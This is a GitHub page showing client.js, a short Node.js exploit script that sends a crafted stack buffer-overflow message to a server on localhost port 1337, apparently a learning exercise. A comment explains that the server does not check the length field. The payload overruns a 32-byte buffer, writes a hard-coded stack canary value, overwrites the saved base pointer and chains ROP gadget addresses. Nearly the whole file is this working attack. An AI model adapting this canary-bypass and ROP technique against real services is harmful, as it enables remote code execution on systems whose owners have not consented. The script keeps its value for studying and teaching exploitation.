-
Notifications
You must be signed in to change notification settings - Fork 0
/
client.js
66 lines (51 loc) · 1.45 KB
/
client.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
const net = require("net");
/*
The server accepts the following message format in bytes:
0 1 2 3 n
+----+----+----+-- ... --+
| ps | payload |
+----+----+----+-- ... --+
ps = payload size
The server doesn't validate incoming ps values. Besides, the
buffer which stores the message payload can only hold up to
32 bytes.
*/
const evilPayload = merge(
string("A".repeat(32)), // fill the buffer
string("B".repeat(8)), // stack alignment
hexLE("0xea8cf540df1f0038"), // stack canary
//string("C".repeat(12 + 4)), // stack alignment and socketfd parameter
string("D".repeat(8)), // stack base pointer
hexLE("0x103572c61"), // ROP gadget #1
string("D".repeat(8)), // stack base pointer
hexLE("0x103572c61"), // ROP gadget #1
);
const evilMessage = merge(byte(evilPayload.length), evilPayload);
const client = new net.Socket();
client.connect(1337, "127.0.0.1", () => {
console.log(evilMessage);
client.write(evilMessage);
client.destroy();
});
// helpers
function merge(...args) {
return Buffer.concat([...args]);
}
function string(str) {
return Buffer.from(str);
}
function byte(b) {
const buffer = Buffer.alloc(1);
buffer[0] = b;
return buffer;
}
function hexLE(string) {
const buffer = Buffer.alloc(8);
buffer.writeBigUInt64LE(BigInt(string), 0);
return buffer;
}
function hexBE(string) {
const buffer = Buffer.alloc(8);
buffer.writeBigUInt64BE(BigInt(string), 0);
return buffer;
}